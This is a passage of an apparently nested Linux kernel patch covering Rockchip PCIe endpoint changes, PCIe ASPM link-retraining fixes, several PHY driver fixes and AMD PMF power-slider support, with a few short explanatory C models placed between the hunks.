+@@ -527,6 +484,8 @@ static int rockchip_pcie_parse_ep_dt(struct rockchip_pcie *rockchip,
+ 	if (err < 0 || ep->max_regions > MAX_REGION_LIMIT)
+ 		ep->max_regions = MAX_REGION_LIMIT;
+ 
++	ep->ob_region_map = 0;
++
+ 	err = of_property_read_u8(dev->of_node, "max-functions",
+ 				  &ep->epc->max_functions);
+ 	if (err < 0)
+@@ -547,7 +506,9 @@ static int rockchip_pcie_ep_probe(struct platform_device *pdev)
+ 	struct rockchip_pcie *rockchip;
+ 	struct pci_epc *epc;
+ 	size_t max_regions;
+-	int err;
++	struct pci_epc_mem_window *windows = NULL;
++	int err, i;
++	u32 cfg_msi, cfg_msix_cp;
+ 
+ 	ep = devm_kzalloc(dev, sizeof(*ep), GFP_KERNEL);
+ 	if (!ep)
+@@ -594,15 +555,27 @@ static int rockchip_pcie_ep_probe(struct platform_device *pdev)
+ 	/* Only enable function 0 by default */
+ 	rockchip_pcie_write(rockchip, BIT(0), PCIE_CORE_PHY_FUNC_CFG);
+ 
+-	err = pci_epc_mem_init(epc, rockchip->mem_res->start,
+-			       resource_size(rockchip->mem_res), PAGE_SIZE);
++	windows = devm_kcalloc(dev, ep->max_regions,
++			       sizeof(struct pci_epc_mem_window), GFP_KERNEL);
++	if (!windows) {
++		err = -ENOMEM;
++		goto err_uninit_port;
++	}
++	for (i = 0; i < ep->max_regions; i++) {
++		windows[i].phys_base = rockchip->mem_res->start + (SZ_1M * i);
++		windows[i].size = SZ_1M;
++		windows[i].page_size = SZ_1M;
++	}
++	err = pci_epc_multi_mem_init(epc, windows, ep->max_regions);
++	devm_kfree(dev, windows);
++
+ 	if (err < 0) {
+ 		dev_err(dev, "failed to initialize the memory space\n");
+ 		goto err_uninit_port;
+ 	}
+ 
+ 	ep->irq_cpu_addr = pci_epc_mem_alloc_addr(epc, &ep->irq_phys_addr,
+-						  SZ_128K);
++						  SZ_1M);
+ 	if (!ep->irq_cpu_addr) {
+ 		dev_err(dev, "failed to reserve memory space for MSI\n");
+ 		err = -ENOMEM;
+@@ -611,6 +584,29 @@ static int rockchip_pcie_ep_probe(struct platform_device *pdev)
+ 
+ 	ep->irq_pci_addr = ROCKCHIP_PCIE_EP_DUMMY_IRQ_ADDR;
+ 
++	/*
++	 * MSI-X is not supported but the controller still advertises the MSI-X
++	 * capability by default, which can lead to the Root Complex
++	 * allocating MSI-X vectors that cannot be used. Avoid this by skipping
++	 * the MSI-X capability entry in the PCIe capabilities linked-list: get
++	 * the next pointer from the MSI-X entry and set that in the MSI
++	 * capability entry (which is the previous entry). This way the MSI-X
++	 * entry is skipped (left out of the linked-list) and not advertised.
++	 */
++	cfg_msi = rockchip_pcie_read(rockchip, PCIE_EP_CONFIG_BASE +
++				     ROCKCHIP_PCIE_EP_MSI_CTRL_REG);
++
++	cfg_msi &= ~ROCKCHIP_PCIE_EP_MSI_CP1_MASK;
++
++	cfg_msix_cp = rockchip_pcie_read(rockchip, PCIE_EP_CONFIG_BASE +
++					 ROCKCHIP_PCIE_EP_MSIX_CAP_REG) &
++					 ROCKCHIP_PCIE_EP_MSIX_CAP_CP_MASK;
++
++	cfg_msi |= cfg_msix_cp;
++
++	rockchip_pcie_write(rockchip, cfg_msi,
++			    PCIE_EP_CONFIG_BASE + ROCKCHIP_PCIE_EP_MSI_CTRL_REG);
++
+ 	rockchip_pcie_write(rockchip, PCIE_CLIENT_CONF_ENABLE,
+ 			    PCIE_CLIENT_CONFIG);
+ 
+diff --git a/drivers/pci/controller/pcie-rockchip.h b/drivers/pci/controller/pcie-rockchip.h
+index 8e92dc3339ecc..fe0333778fd93 100644
+--- a/drivers/pci/controller/pcie-rockchip.h
++++ b/drivers/pci/controller/pcie-rockchip.h
+@@ -139,6 +139,7 @@
+ 
+ #define PCIE_RC_RP_ATS_BASE		0x400000
+ #define PCIE_RC_CONFIG_NORMAL_BASE	0x800000
++#define PCIE_EP_PF_CONFIG_REGS_BASE	0x800000
+ #define PCIE_RC_CONFIG_BASE		0xa00000
+ #define PCIE_EP_CONFIG_BASE		0xa00000
+ #define PCIE_EP_CONFIG_DID_VID		(PCIE_EP_CONFIG_BASE + 0x00)
+@@ -157,10 +158,11 @@
+ #define PCIE_RC_CONFIG_THP_CAP		(PCIE_RC_CONFIG_BASE + 0x274)
+ #define   PCIE_RC_CONFIG_THP_CAP_NEXT_MASK	GENMASK(31, 20)
+ 
++#define PCIE_ADDR_MASK			0xffffff00
+ #define PCIE_CORE_AXI_CONF_BASE		0xc00000
+ #define PCIE_CORE_OB_REGION_ADDR0	(PCIE_CORE_AXI_CONF_BASE + 0x0)
+ #define   PCIE_CORE_OB_REGION_ADDR0_NUM_BITS	0x3f
+-#define   PCIE_CORE_OB_REGION_ADDR0_LO_ADDR	0xffffff00
++#define   PCIE_CORE_OB_REGION_ADDR0_LO_ADDR	PCIE_ADDR_MASK
+ #define PCIE_CORE_OB_REGION_ADDR1	(PCIE_CORE_AXI_CONF_BASE + 0x4)
+ #define PCIE_CORE_OB_REGION_DESC0	(PCIE_CORE_AXI_CONF_BASE + 0x8)
+ #define PCIE_CORE_OB_REGION_DESC1	(PCIE_CORE_AXI_CONF_BASE + 0xc)
+@@ -168,7 +170,7 @@
+ #define PCIE_CORE_AXI_INBOUND_BASE	0xc00800
+ #define PCIE_RP_IB_ADDR0		(PCIE_CORE_AXI_INBOUND_BASE + 0x0)
+ #define   PCIE_CORE_IB_REGION_ADDR0_NUM_BITS	0x3f
+-#define   PCIE_CORE_IB_REGION_ADDR0_LO_ADDR	0xffffff00
++#define   PCIE_CORE_IB_REGION_ADDR0_LO_ADDR	PCIE_ADDR_MASK
+ #define PCIE_RP_IB_ADDR1		(PCIE_CORE_AXI_INBOUND_BASE + 0x4)
+ 
+ /* Size of one AXI Region (not Region 0) */
+@@ -225,6 +227,8 @@
+ #define ROCKCHIP_PCIE_EP_CMD_STATUS			0x4
+ #define   ROCKCHIP_PCIE_EP_CMD_STATUS_IS		BIT(19)
+ #define ROCKCHIP_PCIE_EP_MSI_CTRL_REG			0x90
++#define   ROCKCHIP_PCIE_EP_MSI_CP1_OFFSET		8
++#define   ROCKCHIP_PCIE_EP_MSI_CP1_MASK			GENMASK(15, 8)
+ #define   ROCKCHIP_PCIE_EP_MSI_FLAGS_OFFSET		16
+ #define   ROCKCHIP_PCIE_EP_MSI_CTRL_MMC_OFFSET		17
+ #define   ROCKCHIP_PCIE_EP_MSI_CTRL_MMC_MASK		GENMASK(19, 17)
+@@ -232,14 +236,19 @@
+ #define   ROCKCHIP_PCIE_EP_MSI_CTRL_MME_MASK		GENMASK(22, 20)
+ #define   ROCKCHIP_PCIE_EP_MSI_CTRL_ME				BIT(16)
+ #define   ROCKCHIP_PCIE_EP_MSI_CTRL_MASK_MSI_CAP	BIT(24)
++#define ROCKCHIP_PCIE_EP_MSIX_CAP_REG			0xb0
++#define   ROCKCHIP_PCIE_EP_MSIX_CAP_CP_OFFSET		8
++#define   ROCKCHIP_PCIE_EP_MSIX_CAP_CP_MASK		GENMASK(15, 8)
+ #define ROCKCHIP_PCIE_EP_DUMMY_IRQ_ADDR				0x1
+-#define ROCKCHIP_PCIE_EP_FUNC_BASE(fn)	(((fn) << 12) & GENMASK(19, 12))
++#define ROCKCHIP_PCIE_EP_PCI_LEGACY_IRQ_ADDR		0x3
++#define ROCKCHIP_PCIE_EP_FUNC_BASE(fn) \
++	(PCIE_EP_PF_CONFIG_REGS_BASE + (((fn) << 12) & GENMASK(19, 12)))
++#define ROCKCHIP_PCIE_EP_VIRT_FUNC_BASE(fn) \
++	(PCIE_EP_PF_CONFIG_REGS_BASE + 0x10000 + (((fn) << 12) & GENMASK(19, 12)))
+ #define ROCKCHIP_PCIE_AT_IB_EP_FUNC_BAR_ADDR0(fn, bar) \
+-	(PCIE_RC_RP_ATS_BASE + 0x0840 + (fn) * 0x0040 + (bar) * 0x0008)
++	(PCIE_CORE_AXI_CONF_BASE + 0x0828 + (fn) * 0x0040 + (bar) * 0x0008)
+ #define ROCKCHIP_PCIE_AT_IB_EP_FUNC_BAR_ADDR1(fn, bar) \
+-	(PCIE_RC_RP_ATS_BASE + 0x0844 + (fn) * 0x0040 + (bar) * 0x0008)
+-#define ROCKCHIP_PCIE_AT_OB_REGION_PCI_ADDR0(r) \
+-	(PCIE_RC_RP_ATS_BASE + 0x0000 + ((r) & 0x1f) * 0x0020)
++	(PCIE_CORE_AXI_CONF_BASE + 0x082c + (fn) * 0x0040 + (bar) * 0x0008)
+ #define ROCKCHIP_PCIE_AT_OB_REGION_PCI_ADDR0_DEVFN_MASK	GENMASK(19, 12)
+ #define ROCKCHIP_PCIE_AT_OB_REGION_PCI_ADDR0_DEVFN(devfn) \
+ 	(((devfn) << 12) & \
+@@ -247,20 +256,21 @@
+ #define ROCKCHIP_PCIE_AT_OB_REGION_PCI_ADDR0_BUS_MASK	GENMASK(27, 20)
+ #define ROCKCHIP_PCIE_AT_OB_REGION_PCI_ADDR0_BUS(bus) \
+ 		(((bus) << 20) & ROCKCHIP_PCIE_AT_OB_REGION_PCI_ADDR0_BUS_MASK)
++#define PCIE_RC_EP_ATR_OB_REGIONS_1_32 (PCIE_CORE_AXI_CONF_BASE + 0x0020)
++#define ROCKCHIP_PCIE_AT_OB_REGION_PCI_ADDR0(r) \
++		(PCIE_RC_EP_ATR_OB_REGIONS_1_32 + 0x0000 + ((r) & 0x1f) * 0x0020)
+ #define ROCKCHIP_PCIE_AT_OB_REGION_PCI_ADDR1(r) \
+-		(PCIE_RC_RP_ATS_BASE + 0x0004 + ((r) & 0x1f) * 0x0020)
++		(PCIE_RC_EP_ATR_OB_REGIONS_1_32 + 0x0004 + ((r) & 0x1f) * 0x0020)
+ #define ROCKCHIP_PCIE_AT_OB_REGION_DESC0_HARDCODED_RID	BIT(23)
+ #define ROCKCHIP_PCIE_AT_OB_REGION_DESC0_DEVFN_MASK	GENMASK(31, 24)
+ #define ROCKCHIP_PCIE_AT_OB_REGION_DESC0_DEVFN(devfn) \
+ 		(((devfn) << 24) & ROCKCHIP_PCIE_AT_OB_REGION_DESC0_DEVFN_MASK)
+ #define ROCKCHIP_PCIE_AT_OB_REGION_DESC0(r) \
+-		(PCIE_RC_RP_ATS_BASE + 0x0008 + ((r) & 0x1f) * 0x0020)
+-#define ROCKCHIP_PCIE_AT_OB_REGION_DESC1(r)	\
+-		(PCIE_RC_RP_ATS_BASE + 0x000c + ((r) & 0x1f) * 0x0020)
+-#define ROCKCHIP_PCIE_AT_OB_REGION_CPU_ADDR0(r) \
+-		(PCIE_RC_RP_ATS_BASE + 0x0018 + ((r) & 0x1f) * 0x0020)
+-#define ROCKCHIP_PCIE_AT_OB_REGION_CPU_ADDR1(r) \
+-		(PCIE_RC_RP_ATS_BASE + 0x001c + ((r) & 0x1f) * 0x0020)
++		(PCIE_RC_EP_ATR_OB_REGIONS_1_32 + 0x0008 + ((r) & 0x1f) * 0x0020)
++#define ROCKCHIP_PCIE_AT_OB_REGION_DESC1(r) \
++		(PCIE_RC_EP_ATR_OB_REGIONS_1_32 + 0x000c + ((r) & 0x1f) * 0x0020)
++#define ROCKCHIP_PCIE_AT_OB_REGION_DESC2(r) \
++		(PCIE_RC_EP_ATR_OB_REGIONS_1_32 + 0x0010 + ((r) & 0x1f) * 0x0020)
+ 
+ #define ROCKCHIP_PCIE_CORE_EP_FUNC_BAR_CFG0(fn) \
+ 		(PCIE_CORE_CTRL_MGMT_BASE + 0x0240 + (fn) * 0x0008)
+diff --git a/drivers/pci/pcie/aspm.c b/drivers/pci/pcie/aspm.c
+index 74b8183c305df..07166a4ec27ad 100644
+--- a/drivers/pci/pcie/aspm.c
++++ b/drivers/pci/pcie/aspm.c
+@@ -193,12 +193,39 @@ static void pcie_clkpm_cap_init(struct pcie_link_state *link, int blacklist)
+ 	link->clkpm_disable = blacklist ? 1 : 0;
+ }
+ 
+-static bool pcie_retrain_link(struct pcie_link_state *link)
++static int pcie_wait_for_retrain(struct pci_dev *pdev)
+ {
+-	struct pci_dev *parent = link->pdev;
+ 	unsigned long end_jiffies;
+ 	u16 reg16;
+ 
++	/* Wait for Link Training to be cleared by hardware */
++	end_jiffies = jiffies + LINK_RETRAIN_TIMEOUT;
++	do {
++		pcie_capability_read_word(pdev, PCI_EXP_LNKSTA, &reg16);
++		if (!(reg16 & PCI_EXP_LNKSTA_LT))
++			return 0;
++		msleep(1);
++	} while (time_before(jiffies, end_jiffies));
++
++	return -ETIMEDOUT;
++}
++
++static int pcie_retrain_link(struct pcie_link_state *link)
++{
++	struct pci_dev *parent = link->pdev;
++	int rc;
++	u16 reg16;
++
++	/*
++	 * Ensure the updated LNKCTL parameters are used during link
++	 * training by checking that there is no ongoing link training to
++	 * avoid LTSSM race as recommended in Implementation Note at the
++	 * end of PCIe r6.0.1 sec 7.5.3.7.
++	 */
++	rc = pcie_wait_for_retrain(parent);
++	if (rc)
++		return rc;
++
+ 	pcie_capability_read_word(parent, PCI_EXP_LNKCTL, &reg16);
+ 	reg16 |= PCI_EXP_LNKCTL_RL;
+ 	pcie_capability_write_word(parent, PCI_EXP_LNKCTL, reg16);
+@@ -212,15 +239,7 @@ static bool pcie_retrain_link(struct pcie_link_state *link)
+ 		pcie_capability_write_word(parent, PCI_EXP_LNKCTL, reg16);
+ 	}
+ 
+-	/* Wait for link training end. Break out after waiting for timeout */
+-	end_jiffies = jiffies + LINK_RETRAIN_TIMEOUT;
+-	do {
+-		pcie_capability_read_word(parent, PCI_EXP_LNKSTA, &reg16);
+-		if (!(reg16 & PCI_EXP_LNKSTA_LT))
+-			break;
+-		msleep(1);
+-	} while (time_before(jiffies, end_jiffies));
+-	return !(reg16 & PCI_EXP_LNKSTA_LT);
++	return pcie_wait_for_retrain(parent);
+ }
+ 
+ /*
+@@ -289,15 +308,15 @@ static void pcie_aspm_configure_common_clock(struct pcie_link_state *link)
+ 		reg16 &= ~PCI_EXP_LNKCTL_CCC;
+ 	pcie_capability_write_word(parent, PCI_EXP_LNKCTL, reg16);
+ 
+-	if (pcie_retrain_link(link))
+-		return;
++	if (pcie_retrain_link(link)) {
+ 
+-	/* Training failed. Restore common clock configurations */
+-	pci_err(parent, "ASPM: Could not configure common clock\n");
+-	list_for_each_entry(child, &linkbus->devices, bus_list)
+-		pcie_capability_write_word(child, PCI_EXP_LNKCTL,
++		/* Training failed. Restore common clock configurations */
++		pci_err(parent, "ASPM: Could not configure common clock\n");
++		list_for_each_entry(child, &linkbus->devices, bus_list)
++			pcie_capability_write_word(child, PCI_EXP_LNKCTL,
+ 					   child_reg[PCI_FUNC(child->devfn)]);
+-	pcie_capability_write_word(parent, PCI_EXP_LNKCTL, parent_reg);
++		pcie_capability_write_word(parent, PCI_EXP_LNKCTL, parent_reg);
++	}
+ }
+ 
+ /* Convert L0s latency encoding to ns */
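pcie_retrain_link() now waits for in-flight training to settle both before and after setting the Retrain Link bit. A userspace model of the bounded poll in pcie_wait_for_retrain(), using a monotonic clock in place of jiffies and a fake status bit:

/* Re-read a status bit until it clears or a deadline passes. The
 * "hardware" here is a fake status that clears after a few reads. */
#include <errno.h>
#include <stdio.h>
#include <time.h>
#include <unistd.h>

static int fake_reads;

static int link_training_active(void)	/* stand-in for PCI_EXP_LNKSTA_LT */
{
	return ++fake_reads < 4;
}

static int wait_for_retrain(int timeout_ms)
{
	struct timespec ts;
	long long deadline, now;

	clock_gettime(CLOCK_MONOTONIC, &ts);
	deadline = ts.tv_sec * 1000LL + ts.tv_nsec / 1000000 + timeout_ms;
	do {
		if (!link_training_active())
			return 0;
		usleep(1000);		/* like the kernel's msleep(1) */
		clock_gettime(CLOCK_MONOTONIC, &ts);
		now = ts.tv_sec * 1000LL + ts.tv_nsec / 1000000;
	} while (now < deadline);
	return -ETIMEDOUT;
}

int main(void)
{
	printf("retrain wait: %d\n", wait_for_retrain(100));
	return 0;
}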
+diff --git a/drivers/phy/hisilicon/phy-hisi-inno-usb2.c b/drivers/phy/hisilicon/phy-hisi-inno-usb2.c
+index b133ae06757ab..a922fb11a1092 100644
+--- a/drivers/phy/hisilicon/phy-hisi-inno-usb2.c
++++ b/drivers/phy/hisilicon/phy-hisi-inno-usb2.c
+@@ -158,7 +158,7 @@ static int hisi_inno_phy_probe(struct platform_device *pdev)
+ 		phy_set_drvdata(phy, &priv->ports[i]);
+ 		i++;
+ 
+-		if (i > INNO_PHY_PORT_NUM) {
++		if (i >= INNO_PHY_PORT_NUM) {
+ 			dev_warn(dev, "Support %d ports in maximum\n", i);
+ 			of_node_put(child);
+ 			break;
+diff --git a/drivers/phy/mediatek/phy-mtk-dp.c b/drivers/phy/mediatek/phy-mtk-dp.c
+index 232fd3f1ff1b1..d7024a1443358 100644
+--- a/drivers/phy/mediatek/phy-mtk-dp.c
++++ b/drivers/phy/mediatek/phy-mtk-dp.c
+@@ -169,7 +169,7 @@ static int mtk_dp_phy_probe(struct platform_device *pdev)
+ 
+ 	regs = *(struct regmap **)dev->platform_data;
+ 	if (!regs)
+-		return dev_err_probe(dev, EINVAL,
++		return dev_err_probe(dev, -EINVAL,
+ 				     "No data passed, requires struct regmap**\n");
+ 
+ 	dp_phy = devm_kzalloc(dev, sizeof(*dp_phy), GFP_KERNEL);
+diff --git a/drivers/phy/qualcomm/phy-qcom-snps-femto-v2.c b/drivers/phy/qualcomm/phy-qcom-snps-femto-v2.c
+index a590635962140..6170f8fd118e2 100644
+--- a/drivers/phy/qualcomm/phy-qcom-snps-femto-v2.c
++++ b/drivers/phy/qualcomm/phy-qcom-snps-femto-v2.c
+@@ -110,23 +110,27 @@ struct phy_override_seq {
+ /**
+  * struct qcom_snps_hsphy - snps hs phy attributes
+  *
++ * @dev: device structure
++ *
+  * @phy: generic phy
+  * @base: iomapped memory space for snps hs phy
+  *
+- * @cfg_ahb_clk: AHB2PHY interface clock
+- * @ref_clk: phy reference clock
+- * @iface_clk: phy interface clock
++ * @num_clks: number of clocks
++ * @clks: array of clocks
+  * @phy_reset: phy reset control
+  * @vregs: regulator supplies bulk data
+  * @phy_initialized: if PHY has been initialized correctly
+  * @mode: contains the current mode the PHY is in
++ * @update_seq_cfg: tuning parameters for phy init
+  */
+ struct qcom_snps_hsphy {
++	struct device *dev;
++
+ 	struct phy *phy;
+ 	void __iomem *base;
+ 
+-	struct clk *cfg_ahb_clk;
+-	struct clk *ref_clk;
++	int num_clks;
++	struct clk_bulk_data *clks;
+ 	struct reset_control *phy_reset;
+ 	struct regulator_bulk_data vregs[SNPS_HS_NUM_VREGS];
+ 
+@@ -135,6 +139,34 @@ struct qcom_snps_hsphy {
+ 	struct phy_override_seq update_seq_cfg[NUM_HSPHY_TUNING_PARAMS];
+ };
+ 
++static int qcom_snps_hsphy_clk_init(struct qcom_snps_hsphy *hsphy)
++{
++	struct device *dev = hsphy->dev;
++
++	hsphy->num_clks = 2;
++	hsphy->clks = devm_kcalloc(dev, hsphy->num_clks, sizeof(*hsphy->clks), GFP_KERNEL);
++	if (!hsphy->clks)
++		return -ENOMEM;
++
++	/*
++	 * TODO: Currently no device tree instantiation of the PHY is using the clock.
++	 * This needs to be fixed in order for this code to be able to use devm_clk_bulk_get().
++	 */
++	hsphy->clks[0].id = "cfg_ahb";
++	hsphy->clks[0].clk = devm_clk_get_optional(dev, "cfg_ahb");
++	if (IS_ERR(hsphy->clks[0].clk))
++		return dev_err_probe(dev, PTR_ERR(hsphy->clks[0].clk),
++				     "failed to get cfg_ahb clk\n");
++
++	hsphy->clks[1].id = "ref";
++	hsphy->clks[1].clk = devm_clk_get(dev, "ref");
++	if (IS_ERR(hsphy->clks[1].clk))
++		return dev_err_probe(dev, PTR_ERR(hsphy->clks[1].clk),
++				     "failed to get ref clk\n");
++
++	return 0;
++}
++
+ static inline void qcom_snps_hsphy_write_mask(void __iomem *base, u32 offset,
+ 						u32 mask, u32 val)
+ {
+@@ -165,22 +197,13 @@ static int qcom_snps_hsphy_suspend(struct qcom_snps_hsphy *hsphy)
+ 					   0, USB2_AUTO_RESUME);
+ 	}
+ 
+-	clk_disable_unprepare(hsphy->cfg_ahb_clk);
+ 	return 0;
+ }
+ 
+ static int qcom_snps_hsphy_resume(struct qcom_snps_hsphy *hsphy)
+ {
+-	int ret;
+-
+ 	dev_dbg(&hsphy->phy->dev, "Resume QCOM SNPS PHY, mode\n");
+ 
+-	ret = clk_prepare_enable(hsphy->cfg_ahb_clk);
+-	if (ret) {
+-		dev_err(&hsphy->phy->dev, "failed to enable cfg ahb clock\n");
+-		return ret;
+-	}
+-
+ 	return 0;
+ }
+ 
+@@ -374,16 +397,16 @@ static int qcom_snps_hsphy_init(struct phy *phy)
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = clk_prepare_enable(hsphy->cfg_ahb_clk);
++	ret = clk_bulk_prepare_enable(hsphy->num_clks, hsphy->clks);
+ 	if (ret) {
+-		dev_err(&phy->dev, "failed to enable cfg ahb clock, %d\n", ret);
++		dev_err(&phy->dev, "failed to enable clocks, %d\n", ret);
+ 		goto poweroff_phy;
+ 	}
+ 
+ 	ret = reset_control_assert(hsphy->phy_reset);
+ 	if (ret) {
+ 		dev_err(&phy->dev, "failed to assert phy_reset, %d\n", ret);
+-		goto disable_ahb_clk;
++		goto disable_clks;
+ 	}
+ 
+ 	usleep_range(100, 150);
+@@ -391,7 +414,7 @@ static int qcom_snps_hsphy_init(struct phy *phy)
+ 	ret = reset_control_deassert(hsphy->phy_reset);
+ 	if (ret) {
+ 		dev_err(&phy->dev, "failed to de-assert phy_reset, %d\n", ret);
+-		goto disable_ahb_clk;
++		goto disable_clks;
+ 	}
+ 
+ 	qcom_snps_hsphy_write_mask(hsphy->base, USB2_PHY_USB_PHY_CFG0,
+@@ -448,8 +471,8 @@ static int qcom_snps_hsphy_init(struct phy *phy)
+ 
+ 	return 0;
+ 
+-disable_ahb_clk:
+-	clk_disable_unprepare(hsphy->cfg_ahb_clk);
++disable_clks:
++	clk_bulk_disable_unprepare(hsphy->num_clks, hsphy->clks);
+ poweroff_phy:
+ 	regulator_bulk_disable(ARRAY_SIZE(hsphy->vregs), hsphy->vregs);
+ 
+@@ -461,7 +484,7 @@ static int qcom_snps_hsphy_exit(struct phy *phy)
+ 	struct qcom_snps_hsphy *hsphy = phy_get_drvdata(phy);
+ 
+ 	reset_control_assert(hsphy->phy_reset);
+-	clk_disable_unprepare(hsphy->cfg_ahb_clk);
++	clk_bulk_disable_unprepare(hsphy->num_clks, hsphy->clks);
+ 	regulator_bulk_disable(ARRAY_SIZE(hsphy->vregs), hsphy->vregs);
+ 	hsphy->phy_initialized = false;
+ 
+@@ -554,14 +577,15 @@ static int qcom_snps_hsphy_probe(struct platform_device *pdev)
+ 	if (!hsphy)
+ 		return -ENOMEM;
+ 
++	hsphy->dev = dev;
++
+ 	hsphy->base = devm_platform_ioremap_resource(pdev, 0);
+ 	if (IS_ERR(hsphy->base))
+ 		return PTR_ERR(hsphy->base);
+ 
+-	hsphy->ref_clk = devm_clk_get(dev, "ref");
+-	if (IS_ERR(hsphy->ref_clk))
+-		return dev_err_probe(dev, PTR_ERR(hsphy->ref_clk),
+-				     "failed to get ref clk\n");
++	ret = qcom_snps_hsphy_clk_init(hsphy);
++	if (ret)
++		return dev_err_probe(dev, ret, "failed to initialize clocks\n");
+ 
+ 	hsphy->phy_reset = devm_reset_control_get_exclusive(&pdev->dev, NULL);
+ 	if (IS_ERR(hsphy->phy_reset)) {
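The driver above moves from individually managed clocks to the clk_bulk API so the init and exit paths handle the set as a unit. A sketch of that pattern with the clk layer stubbed out:

/* Collect named clocks into one array and enable or disable them as a
 * unit, unwinding already-enabled clocks on failure. */
#include <stdio.h>

struct clk_bulk_data { const char *id; int enabled; };

static int clk_enable_one(struct clk_bulk_data *c)
{
	c->enabled = 1;
	printf("enabled %s\n", c->id);
	return 0;
}

static int clk_bulk_prepare_enable(int n, struct clk_bulk_data *clks)
{
	for (int i = 0; i < n; i++) {
		if (clk_enable_one(&clks[i])) {
			while (--i >= 0)	/* unwind on failure */
				clks[i].enabled = 0;
			return -1;
		}
	}
	return 0;
}

static void clk_bulk_disable_unprepare(int n, struct clk_bulk_data *clks)
{
	while (--n >= 0)
		clks[n].enabled = 0;
}

int main(void)
{
	struct clk_bulk_data clks[] = { { "cfg_ahb" }, { "ref" } };

	if (clk_bulk_prepare_enable(2, clks))
		return 1;
	clk_bulk_disable_unprepare(2, clks);
	return 0;
}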
+diff --git a/drivers/platform/x86/amd/pmf/acpi.c b/drivers/platform/x86/amd/pmf/acpi.c
+index 081e84e116e79..3fc5e4547d9f2 100644
+--- a/drivers/platform/x86/amd/pmf/acpi.c
++++ b/drivers/platform/x86/amd/pmf/acpi.c
+@@ -106,6 +106,27 @@ int apmf_get_static_slider_granular(struct amd_pmf_dev *pdev,
+ 									 data, sizeof(*data));
+ }
+ 
++int apmf_os_power_slider_update(struct amd_pmf_dev *pdev, u8 event)
++{
++	struct os_power_slider args;
++	struct acpi_buffer params;
++	union acpi_object *info;
++	int err = 0;
++
++	args.size = sizeof(args);
++	args.slider_event = event;
++
++	params.length = sizeof(args);
++	params.pointer = (void *)&args;
++
++	info = apmf_if_call(pdev, APMF_FUNC_OS_POWER_SLIDER_UPDATE, &params);
++	if (!info)
++		err = -EIO;
++
++	kfree(info);
++	return err;
++}
++
+ static void apmf_sbios_heartbeat_notify(struct work_struct *work)
+ {
+ 	struct amd_pmf_dev *dev = container_of(work, struct amd_pmf_dev, heart_beat.work);
+@@ -289,7 +310,7 @@ int apmf_acpi_init(struct amd_pmf_dev *pmf_dev)
+ 
+ 	ret = apmf_get_system_params(pmf_dev);
+ 	if (ret) {
+-		dev_err(pmf_dev->dev, "APMF apmf_get_system_params failed :%d\n", ret);
++		dev_dbg(pmf_dev->dev, "APMF apmf_get_system_params failed :%d\n", ret);
+ 		goto out;
+ 	}
+ 
+diff --git a/drivers/platform/x86/amd/pmf/core.c b/drivers/platform/x86/amd/pmf/core.c
+index 73d2357e32f8e..8a38cd94a605d 100644
+--- a/drivers/platform/x86/amd/pmf/core.c
++++ b/drivers/platform/x86/amd/pmf/core.c
+@@ -71,7 +71,11 @@ static int amd_pmf_pwr_src_notify_call(struct notifier_block *nb, unsigned long
+ 			return NOTIFY_DONE;
+ 	}
+ 
+-	amd_pmf_set_sps_power_limits(pmf);
++	if (is_apmf_func_supported(pmf, APMF_FUNC_STATIC_SLIDER_GRANULAR))
++		amd_pmf_set_sps_power_limits(pmf);
++
++	if (is_apmf_func_supported(pmf, APMF_FUNC_OS_POWER_SLIDER_UPDATE))
++		amd_pmf_power_slider_update_event(pmf);
+ 
+ 	return NOTIFY_OK;
+ }
+@@ -295,7 +299,8 @@ static void amd_pmf_init_features(struct amd_pmf_dev *dev)
+ 	int ret;
+ 
+ 	/* Enable Static Slider */
+-	if (is_apmf_func_supported(dev, APMF_FUNC_STATIC_SLIDER_GRANULAR)) {
++	if (is_apmf_func_supported(dev, APMF_FUNC_STATIC_SLIDER_GRANULAR) ||
++	    is_apmf_func_supported(dev, APMF_FUNC_OS_POWER_SLIDER_UPDATE)) {
+ 		amd_pmf_init_sps(dev);
+ 		dev->pwr_src_notifier.notifier_call = amd_pmf_pwr_src_notify_call;
+ 		power_supply_reg_notifier(&dev->pwr_src_notifier);
+diff --git a/drivers/platform/x86/amd/pmf/pmf.h b/drivers/platform/x86/amd/pmf/pmf.h
+index 06c30cdc05733..deba88e6e4c8d 100644
+--- a/drivers/platform/x86/amd/pmf/pmf.h
++++ b/drivers/platform/x86/amd/pmf/pmf.h
+@@ -21,6 +21,7 @@
+ #define APMF_FUNC_SBIOS_HEARTBEAT			4
+ #define APMF_FUNC_AUTO_MODE					5
+ #define APMF_FUNC_SET_FAN_IDX				7
++#define APMF_FUNC_OS_POWER_SLIDER_UPDATE		8
+ #define APMF_FUNC_STATIC_SLIDER_GRANULAR       9
+ #define APMF_FUNC_DYN_SLIDER_AC				11
+ #define APMF_FUNC_DYN_SLIDER_DC				12
+@@ -44,6 +45,14 @@
+ #define GET_STT_LIMIT_APU	0x20
+ #define GET_STT_LIMIT_HS2	0x21
+ 
++/* OS slider update notification */
++#define DC_BEST_PERF		0
++#define DC_BETTER_PERF		1
++#define DC_BATTERY_SAVER	3
++#define AC_BEST_PERF		4
++#define AC_BETTER_PERF		5
++#define AC_BETTER_BATTERY	6
++
+ /* Fan Index for Auto Mode */
+ #define FAN_INDEX_AUTO		0xFFFFFFFF
+ 
+@@ -193,6 +202,11 @@ struct amd_pmf_static_slider_granular {
+ 	struct apmf_sps_prop_granular prop[POWER_SOURCE_MAX][POWER_MODE_MAX];
+ };
+ 
++struct os_power_slider {
++	u16 size;
++	u8 slider_event;
++} __packed;
++
+ struct fan_table_control {
+ 	bool manual;
+ 	unsigned long fan_id;
+@@ -383,6 +397,7 @@ int amd_pmf_send_cmd(struct amd_pmf_dev *dev, u8 message, bool get, u32 arg, u32
+ int amd_pmf_init_metrics_table(struct amd_pmf_dev *dev);
+ int amd_pmf_get_power_source(void);
+ int apmf_install_handler(struct amd_pmf_dev *pmf_dev);
++int apmf_os_power_slider_update(struct amd_pmf_dev *dev, u8 flag);
+ 
+ /* SPS Layer */
+ int amd_pmf_get_pprof_modes(struct amd_pmf_dev *pmf);
+@@ -393,6 +408,7 @@ void amd_pmf_deinit_sps(struct amd_pmf_dev *dev);
+ int apmf_get_static_slider_granular(struct amd_pmf_dev *pdev,
+ 				    struct apmf_static_slider_granular_output *output);
+ bool is_pprof_balanced(struct amd_pmf_dev *pmf);
++int amd_pmf_power_slider_update_event(struct amd_pmf_dev *dev);
+ 
+ 
+ int apmf_update_fan_idx(struct amd_pmf_dev *pdev, bool manual, u32 idx);
